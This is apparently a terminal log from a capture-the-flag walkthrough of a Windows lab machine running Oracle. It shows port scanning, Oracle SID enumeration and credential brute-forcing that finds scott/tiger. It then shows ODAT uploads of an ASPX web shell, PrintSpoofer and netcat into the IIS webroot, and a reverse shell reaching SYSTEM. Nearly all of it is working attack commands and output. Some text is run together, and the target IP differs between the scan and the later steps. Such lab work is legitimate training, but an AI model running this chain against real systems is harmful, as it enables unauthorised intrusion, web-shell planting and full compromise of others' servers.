uzi@kali ~/D/06_Wordlists> nmap-n--min-rate2000-T4-p---max-retries10-Pn-sC-sV10.129.196.225 StartingNmap7.93 ( https://nmap.org ) at 2023-06-02 23:30 CST Stats: 0:02:33 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 93.33% done; ETC: 23:33 (0:00:08 remaining) Nmap scan report for 10.129.196.225 Host is up (0.23s latency). Notshown: 65520 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 8.5 | http-methods: |_ Potentially risky methods: TRACE |_http-title: IIS Windows Server |_http-server-header: Microsoft-IIS/8.5 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49159/tcp open oracle-tns Oracle TNS listener (requires service name) 49160/tcp open msrpc Microsoft Windows RPC 49161/tcp open msrpc Microsoft Windows RPC 49162/tcp open msrpc Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 176.69 seconds
Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 1521yes The target port (TCP) THREADS 1yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/oracle/sid_enum) > set rhosts 10.129.95.188 rhosts => 10.129.95.188 msf6 auxiliary(scanner/oracle/sid_enum) > run
Name Current Setting Required Description ---- --------------- -------- ----------- BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from0to5 DB_ALL_CREDS falseno Try eachuser/password couple stored in the current database DB_ALL_PASS falsenoAddall passwords in the current database to the list DB_ALL_USERS falsenoAddall users in the current database to the list DB_SKIP_EXISTING nonenoSkip existing credentials stored in the current database (Accepted: none, user, user&realm) RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 1521 yes The target port (TCP) SID no A specific SID to attempt. SID_FILE /usr/share/metasploit-framework/data/wordlists/sid.txt no File containing instance names, oneper line STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads (max oneper host) VERBOSE true yes Whether to print output forall attempts
View the fullmodule info with the info, or info -d command.
[1] (10.129.95.188:1521): Searching valid accounts on the 10.129.95.188 server, port 1521 The login cis has already been tested at least once. What do you want to do: | ETA: 00:21:01 - stop (s/S) - continue and ask every time (a/A) - skip and continue to ask (p/P) - continue without to ask (c/C) c [!] Notice: 'ctxsys' account is locked, so skipping this username for password | ETA: 00:21:39 [!] Notice: 'dbsnmp' account is locked, so skipping this username for password | ETA: 00:20:50 [!] Notice: 'dip' account is locked, so skipping this username for password | ETA: 00:19:44 [!] Notice: 'hr' account is locked, so skipping this username for password | ETA: 00:16:47 [!] Notice: 'mdsys' account is locked, so skipping this username for password | ETA: 00:12:51 [!] Notice: 'oracle_ocm' account is locked, so skipping this username for password | ETA: 00:10:03 [!] Notice: 'outln' account is locked, so skipping this username for password | ETA: 00:09:01 [+] Valid credentials found: scott/tiger. Continue... | ETA: 00:04:59 [!] Notice: 'system' account is locked, so skipping this username for password | ETA: 00:03:59 [!] Notice: 'xdb' account is locked, so skipping this username for password######### | ETA: 00:00:59 100% |##################################################################################| Time: 00:24:45 [+] Accounts found on 10.129.95.188:1521/sid:XE: scott/tiger
[1] (10.129.95.188:1521): Read the hosts file stored inC://windows/system32/drivers/etc on the 10.129.95.188 server [+] Data stored in the hosts file sored inC://windows/system32/drivers/etc (copied in /tmp/hosts1 locally): b"# Copyright (c) 1993-2009 Microsoft Corp.\n#\n# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\n#\n# This file contains the mappings of IP addresses to host names. Each\n# entry should be kept on an individual line. The IP address should\n# be placed in the first column followed by the corresponding host name.\n# The IP address and the host name should be separated by at least one\n# space.\n#\n# Additionally, comments (such as these) may be inserted on individual\n# lines or following the machine name denoted by a '#' symbol.\n#\n# For example:\n#\n# 102.54.94.97 rhino.acme.com # source server\n# 38.25.63.10 x.acme.com # x client host\n\n# localhost name resolution is handled within DNS itself.\n#\t127.0.0.1 localhost\n#\t::1 localhost\n"
[1] (10.129.95.188:1521): Read the hosts file stored in C://windows/system32/drivers/etc on the 10.129.95.188 server [-] Impossible to read the ['C://windows/system32/drivers/etc', 'hosts', '/tmp/hosts1'] file: `ORA-01031: insufficient privileges`
[1] (10.129.95.188:1521): Put the /usr/share/webshells/aspx/cmdasp.aspx local file in the C:\Inetpub\wwwroot folder like a.aspx on the 10.129.95.188 server [+] The /usr/share/webshells/aspx/cmdasp.aspx file was created on the C:\Inetpub\wwwroot directory on the 10.129.95.188 server like the a.aspx file
[1] (10.129.95.188:1521): Put the /home/uzi/Documents/04_Privilege_Escalation/PrintSpoofer.exe local file in the C:\Inetpub\wwwroot folder like PrintSpoofer.exe on the 10.129.95.188 server [+] The /home/uzi/Documents/04_Privilege_Escalation/PrintSpoofer.exe file was created on the C:\Inetpub\wwwroot directory on the 10.129.95.188 server like the PrintSpoofer.exe file (venv) uzi@kali ~/D/0/odat (master-python3)> python ./odat.py utlfile -s 10.129.95.188 -U scott -P tiger -d XE --sysdba --putFile 'C:\Inetpub\wwwroot' nc64.exe /home/uzi/Documents/04_Privilege_Escalation/nc.exe/nc64.exe
[1] (10.129.95.188:1521): Put the /home/uzi/Documents/04_Privilege_Escalation/nc.exe/nc64.exe local file in the C:\Inetpub\wwwroot folder like nc64.exe on the 10.129.95.188 server [+] The /home/uzi/Documents/04_Privilege_Escalation/nc.exe/nc64.exe file was created on the C:\Inetpub\wwwroot directory on the 10.129.95.188 server like the nc64.exe file
本地监听端口: uzi@kali ~/D/0/h/M/Silo> nc -lvnp 9002 Listening on0.0.0.09002 Connection received on10.129.95.18849166 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami whoami nt authority\system